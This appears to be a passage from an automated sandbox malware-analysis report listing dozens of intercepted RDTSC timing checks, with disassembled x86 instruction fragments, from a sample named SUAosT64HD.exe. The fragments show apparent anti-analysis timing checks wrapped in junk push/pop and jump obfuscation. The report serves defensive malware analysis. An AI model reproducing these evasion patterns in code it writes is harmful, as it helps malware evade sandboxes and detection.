Source: C:\Users\user\Desktop\SUAosT64HD.exe RDTSC instruction interceptor: First address: 6BA744 second address: 6BA748 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe RDTSC instruction interceptor: First address: 6BA748 second address: 6BA74C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe RDTSC instruction interceptor: First address: 6BC3EC second address: 6BC3FC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC3507E537Bh 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe RDTSC instruction interceptor: First address: 6BDD8C second address: 6BDD90 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe RDTSC instruction interceptor: First address: 6BDD90 second address: 6BDDA5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push ecx 0x00000009 pushad 0x0000000a popad 0x0000000b pop ecx 0x0000000c pushad 0x0000000d jnp 00007FC3507E5376h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe RDTSC instruction interceptor: First address: 6BDDA5 second address: 6BDDAC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe RDTSC instruction interceptor: First address: 6BCB5F second address: 6BCB63 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe RDTSC instruction interceptor: First address: 6BFDEE second address: 6BFE0E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC350C3E724h 0x00000009 popad 0x0000000a pushad 0x0000000b pushad 0x0000000c popad 0x0000000d pushad 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe RDTSC instruction interceptor: First address: 67A0EB second address: 67A0EF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe RDTSC instruction interceptor: First address: 6C1989 second address: 6C199D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FC350C3E720h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe RDTSC instruction interceptor: First address: 6C467C second address: 6C4682 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe RDTSC instruction interceptor: First address: 6C4682 second address: 6C46B6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FC350C3E71Eh 0x0000000b jmp 00007FC350C3E729h 0x00000010 pushad 0x00000011 push edi 0x00000012 pop edi 0x00000013 push ecx 0x00000014 pop ecx 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe RDTSC instruction interceptor: First address: 6C5C52 second address: 6C5C56 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe RDTSC instruction interceptor: First address: 6C5C56 second address: 6C5C5C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe RDTSC instruction interceptor: First address: 6C5C5C second address: 6C5C9C instructions: 0x00000000 rdtsc 0x00000002 ja 00007FC3507E5378h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esp], eax 0x0000000d mov edi, dword ptr [ebp+12478FDCh] 0x00000013 push 00000000h 0x00000015 pushad 0x00000016 sbb ch, FFFFFF87h 0x00000019 add dword ptr [ebp+122D2156h], edi 0x0000001f popad 0x00000020 sbb bx, A31Dh 0x00000025 push 00000000h 0x00000027 mov edi, dword ptr [ebp+122D1FDDh] 0x0000002d push eax 0x0000002e push eax 0x0000002f push edx 0x00000030 push edx 0x00000031 jmp 00007FC3507E537Ch 0x00000036 pop edx 0x00000037 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe RDTSC instruction interceptor: First address: 6C5C9C second address: 6C5CA2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe RDTSC instruction interceptor: First address: 6C5CA2 second address: 6C5CA6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe RDTSC instruction interceptor: First address: 6C6EE2 second address: 6C6EE8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe RDTSC instruction interceptor: First address: 6C6EE8 second address: 6C6EEC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe RDTSC instruction interceptor: First address: 6C6EEC second address: 6C6F03 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jnc 00007FC350C3E71Ch 0x00000011 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe RDTSC instruction interceptor: First address: 6C9A3E second address: 6C9A42 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe RDTSC instruction interceptor: First address: 6C9C42 second address: 6C9C46 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe RDTSC instruction interceptor: First address: 6CAC47 second address: 6CAC51 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FC3507E537Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe RDTSC instruction interceptor: First address: 6CBCF6 second address: 6CBD00 instructions: 0x00000000 rdtsc 0x00000002 jg 00007FC350C3E716h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe RDTSC instruction interceptor: First address: 6CAC51 second address: 6CACE6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 nop 0x00000007 sub dword ptr [ebp+122D23FFh], ebx 0x0000000d push dword ptr fs:[00000000h] 0x00000014 push 00000000h 0x00000016 push esi 0x00000017 call 00007FC3507E5378h 0x0000001c pop esi 0x0000001d mov dword ptr [esp+04h], esi 0x00000021 add dword ptr [esp+04h], 0000001Bh 0x00000029 inc esi 0x0000002a push esi 0x0000002b ret 0x0000002c pop esi 0x0000002d ret 0x0000002e mov edi, 0358694Fh 0x00000033 movsx ebx, ax 0x00000036 mov dword ptr fs:[00000000h], esp 0x0000003d movzx edi, di 0x00000040 mov eax, dword ptr [ebp+122D127Dh] 0x00000046 call 00007FC3507E5383h 0x0000004b pushad 0x0000004c je 00007FC3507E5376h 0x00000052 mov dx, BCF0h 0x00000056 popad 0x00000057 pop edi 0x00000058 mov ebx, 48D2F867h 0x0000005d push FFFFFFFFh 0x0000005f jmp 00007FC3507E537Dh 0x00000064 nop 0x00000065 jmp 00007FC3507E537Ah 0x0000006a push eax 0x0000006b push eax 0x0000006c push edx 0x0000006d push ebx 0x0000006e pushad 0x0000006f popad 0x00000070 pop ebx 0x00000071 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe RDTSC instruction interceptor: First address: 6CBD00 second address: 6CBD5E instructions: 0x00000000 rdtsc 0x00000002 jne 00007FC350C3E71Ch 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esp], eax 0x0000000d push 00000000h 0x0000000f push esi 0x00000010 call 00007FC350C3E718h 0x00000015 pop esi 0x00000016 mov dword ptr [esp+04h], esi 0x0000001a add dword ptr [esp+04h], 00000019h 0x00000022 inc esi 0x00000023 push esi 0x00000024 ret 0x00000025 pop esi 0x00000026 ret 0x00000027 mov bl, 14h 0x00000029 push 00000000h 0x0000002b clc 0x0000002c push 00000000h 0x0000002e push 00000000h 0x00000030 push edx 0x00000031 call 00007FC350C3E718h 0x00000036 pop edx 0x00000037 mov dword ptr [esp+04h], edx 0x0000003b add dword ptr [esp+04h], 00000014h 0x00000043 inc edx 0x00000044 push edx 0x00000045 ret 0x00000046 pop edx 0x00000047 ret 0x00000048 xchg eax, esi 0x00000049 push eax 0x0000004a push edx 0x0000004b push eax 0x0000004c pushad 0x0000004d popad 0x0000004e pop eax 0x0000004f rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe RDTSC instruction interceptor: First address: 6CACE6 second address: 6CACEC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe RDTSC instruction interceptor: First address: 6CACEC second address: 6CACF0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe RDTSC instruction interceptor: First address: 6D0E25 second address: 6D0E2A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe RDTSC instruction interceptor: First address: 6D0E2A second address: 6D0E30 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe RDTSC instruction interceptor: First address: 6CCE6B second address: 6CCE76 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007FC3507E5376h 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe RDTSC instruction interceptor: First address: 6D0E30 second address: 6D0E34 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe RDTSC instruction interceptor: First address: 6CCE76 second address: 6CCEA2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jmp 00007FC3507E5386h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007FC3507E537Ah 0x00000016 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe RDTSC instruction interceptor: First address: 6D0E34 second address: 6D0E38 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe RDTSC instruction interceptor: First address: 6D0E38 second address: 6D0E54 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push esi 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FC3507E5380h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe RDTSC instruction interceptor: First address: 6D1E80 second address: 6D1EA9 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FC350C3E716h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop eax 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jp 00007FC350C3E72Bh 0x00000014 jmp 00007FC350C3E725h 0x00000019 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe RDTSC instruction interceptor: First address: 6D1EA9 second address: 6D1F30 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pushad 0x00000004 popad 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 push 00000000h 0x0000000b push esi 0x0000000c call 00007FC3507E5378h 0x00000011 pop esi 0x00000012 mov dword ptr [esp+04h], esi 0x00000016 add dword ptr [esp+04h], 00000019h 0x0000001e inc esi 0x0000001f push esi 0x00000020 ret 0x00000021 pop esi 0x00000022 ret 0x00000023 push 00000000h 0x00000025 push 00000000h 0x00000027 push ecx 0x00000028 call 00007FC3507E5378h 0x0000002d pop ecx 0x0000002e mov dword ptr [esp+04h], ecx 0x00000032 add dword ptr [esp+04h], 00000015h 0x0000003a inc ecx 0x0000003b push ecx 0x0000003c ret 0x0000003d pop ecx 0x0000003e ret 0x0000003f je 00007FC3507E5393h 0x00000045 pushad 0x00000046 mov dword ptr [ebp+1246E893h], edi 0x0000004c call 00007FC3507E5384h 0x00000051 pop eax 0x00000052 popad 0x00000053 mov bx, EBDEh 0x00000057 push 00000000h 0x00000059 movzx ebx, bx 0x0000005c xchg eax, esi 0x0000005d push eax 0x0000005e push edx 0x0000005f jmp 00007FC3507E537Fh 0x00000064 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe RDTSC instruction interceptor: First address: 6D1F30 second address: 6D1F62 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC350C3E723h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jo 00007FC350C3E734h 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007FC350C3E722h 0x00000017 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe RDTSC instruction interceptor: First address: 6D2E90 second address: 6D2E94 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe RDTSC instruction interceptor: First address: 6D4134 second address: 6D4139 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe RDTSC instruction interceptor: First address: 6DBDDA second address: 6DBDF6 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 jmp 00007FC3507E537Ah 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FC3507E537Ah 0x00000012 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe RDTSC instruction interceptor: First address: 6DBDF6 second address: 6DBE0E instructions: 0x00000000 rdtsc 0x00000002 jo 00007FC350C3E716h 0x00000008 jmp 00007FC350C3E71Eh 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe RDTSC instruction interceptor: First address: 6DB4CE second address: 6DB4E2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pushad 0x00000004 popad 0x00000005 pushad 0x00000006 popad 0x00000007 pop eax 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push edx 0x0000000b pushad 0x0000000c jg 00007FC3507E5376h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe RDTSC instruction interceptor: First address: 6E1D45 second address: 6E1DB1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC350C3E71Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [esp+04h] 0x0000000d pushad 0x0000000e jmp 00007FC350C3E723h 0x00000013 jmp 00007FC350C3E720h 0x00000018 popad 0x00000019 mov eax, dword ptr [eax] 0x0000001b pushad 0x0000001c push edi 0x0000001d jmp 00007FC350C3E724h 0x00000022 pop edi 0x00000023 jmp 00007FC350C3E720h 0x00000028 popad 0x00000029 mov dword ptr [esp+04h], eax 0x0000002d pushad 0x0000002e push eax 0x0000002f push edx 0x00000030 pushad 0x00000031 popad 0x00000032 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe RDTSC instruction interceptor: First address: 6E5962 second address: 6E5983 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC3507E5389h 0x00000009 push eax 0x0000000a push edx 0x0000000b push edi 0x0000000c pop edi 0x0000000d rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe RDTSC instruction interceptor: First address: 6E6078 second address: 6E607C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe RDTSC instruction interceptor: First address: 6E607C second address: 6E6082 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe RDTSC instruction interceptor: First address: 6E6221 second address: 6E6235 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FC350C3E71Eh 0x00000008 push eax 0x00000009 push edx 0x0000000a push ecx 0x0000000b pop ecx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe RDTSC instruction interceptor: First address: 6E6235 second address: 6E6239 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe RDTSC instruction interceptor: First address: 6E638F second address: 6E63A2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 jl 00007FC350C3E718h 0x0000000b pushad 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 pop eax 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe RDTSC instruction interceptor: First address: 6E63A2 second address: 6E63A6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe RDTSC instruction interceptor: First address: 6E6665 second address: 6E666F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe RDTSC instruction interceptor: First address: 6E6A85 second address: 6E6AAE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jo 00007FC3507E5376h 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c jmp 00007FC3507E537Eh 0x00000011 pop edx 0x00000012 pop eax 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 jl 00007FC3507E5376h 0x0000001c pop eax 0x0000001d pushad 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe RDTSC instruction interceptor: First address: 6E6AAE second address: 6E6ACD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC350C3E722h 0x00000009 push eax 0x0000000a pop eax 0x0000000b jnp 00007FC350C3E716h 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe RDTSC instruction interceptor: First address: 6E6ACD second address: 6E6AEA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FC3507E5388h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe RDTSC instruction interceptor: First address: 6EF104 second address: 6EF108 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe RDTSC instruction interceptor: First address: 6EDCB8 second address: 6EDCC2 instructions: 0x00000000 rdtsc 0x00000002 jl 00007FC3507E537Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe RDTSC instruction interceptor: First address: 6EDCC2 second address: 6EDCD4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 jmp 00007FC350C3E71Ah 0x0000000b push ecx 0x0000000c pop ecx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe RDTSC instruction interceptor: First address: 6EDE9D second address: 6EDEBD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jbe 00007FC3507E5382h 0x0000000c jnp 00007FC3507E537Ch 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe RDTSC instruction interceptor: First address: 6EE01F second address: 6EE071 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pushad 0x00000006 jmp 00007FC350C3E729h 0x0000000b push edx 0x0000000c pop edx 0x0000000d jmp 00007FC350C3E723h 0x00000012 pushad 0x00000013 popad 0x00000014 popad 0x00000015 push eax 0x00000016 push edx 0x00000017 jmp 00007FC350C3E729h 0x0000001c rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe RDTSC instruction interceptor: First address: 6EE385 second address: 6EE38B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe RDTSC instruction interceptor: First address: 6EE939 second address: 6EE94E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 jnl 00007FC350C3E720h 0x0000000b rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe RDTSC instruction interceptor: First address: 6EE94E second address: 6EE95E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnc 00007FC3507E5376h 0x0000000a jp 00007FC3507E5376h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe RDTSC instruction interceptor: First address: 6EEAB9 second address: 6EEAEF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC350C3E71Ch 0x00000007 jbe 00007FC350C3E722h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007FC350C3E722h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe RDTSC instruction interceptor: First address: 6F24A3 second address: 6F24D9 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 jmp 00007FC3507E5382h 0x0000000e jmp 00007FC3507E5389h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe RDTSC instruction interceptor: First address: 6F24D9 second address: 6F2505 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push esi 0x00000006 jmp 00007FC350C3E724h 0x0000000b pop esi 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FC350C3E71Dh 0x00000013 pushad 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe RDTSC instruction interceptor: First address: 6F2505 second address: 6F250B instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe RDTSC instruction interceptor: First address: 6B7098 second address: 6B709C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe RDTSC instruction interceptor: First address: 6B709C second address: 6B70A2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe RDTSC instruction interceptor: First address: 6B70A2 second address: 6B70C5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FC350C3E71Ch 0x00000008 js 00007FC350C3E716h 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 push eax 0x00000012 push eax 0x00000013 push edx 0x00000014 jc 00007FC350C3E718h 0x0000001a push edx 0x0000001b pop edx 0x0000001c rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe RDTSC instruction interceptor: First address: 6B70C5 second address: 6B70D7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FC3507E537Eh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe RDTSC instruction interceptor: First address: 6B70D7 second address: 6B7119 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 mov cx, DCF2h 0x0000000d lea eax, dword ptr [ebp+1247BDA4h] 0x00000013 push 00000000h 0x00000015 push edx 0x00000016 call 00007FC350C3E718h 0x0000001b pop edx 0x0000001c mov dword ptr [esp+04h], edx 0x00000020 add dword ptr [esp+04h], 0000001Ch 0x00000028 inc edx 0x00000029 push edx 0x0000002a ret 0x0000002b pop edx 0x0000002c ret 0x0000002d mov edi, 6A21E9ECh 0x00000032 push eax 0x00000033 pushad 0x00000034 push eax 0x00000035 push edx 0x00000036 push eax 0x00000037 push edx 0x00000038 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe RDTSC instruction interceptor: First address: 6B7119 second address: 6B711D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe RDTSC instruction interceptor: First address: 6B711D second address: 6B7127 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe RDTSC instruction interceptor: First address: 6B7127 second address: 6A1C14 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov dword ptr [esp], eax 0x0000000a push 00000000h 0x0000000c push ebx 0x0000000d call 00007FC3507E5378h 0x00000012 pop ebx 0x00000013 mov dword ptr [esp+04h], ebx 0x00000017 add dword ptr [esp+04h], 00000019h 0x0000001f inc ebx 0x00000020 push ebx 0x00000021 ret 0x00000022 pop ebx 0x00000023 ret 0x00000024 push ecx 0x00000025 mov edx, dword ptr [ebp+122D3A49h] 0x0000002b pop edx 0x0000002c call dword ptr [ebp+1245BB4Ch] 0x00000032 pushad 0x00000033 jmp 00007FC3507E5386h 0x00000038 push ebx 0x00000039 pushad 0x0000003a popad 0x0000003b push eax 0x0000003c push edx 0x0000003d rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe RDTSC instruction interceptor: First address: 6B7522 second address: 6B7528 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe RDTSC instruction interceptor: First address: 6B7639 second address: 6B7672 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC3507E5389h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push edi 0x0000000d jmp 00007FC3507E5387h 0x00000012 pop edi 0x00000013 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe RDTSC instruction interceptor: First address: 6B7672 second address: 6B767C instructions: 0x00000000 rdtsc 0x00000002 js 00007FC350C3E71Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe RDTSC instruction interceptor: First address: 6B7724 second address: 6B776A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 jng 00007FC3507E5382h 0x0000000b jmp 00007FC3507E537Ch 0x00000010 popad 0x00000011 add dword ptr [esp], 78EEC7CAh 0x00000018 mov di, 1200h 0x0000001c call 00007FC3507E5379h 0x00000021 je 00007FC3507E5394h 0x00000027 push eax 0x00000028 push edx 0x00000029 jmp 00007FC3507E5382h 0x0000002e rdtsc
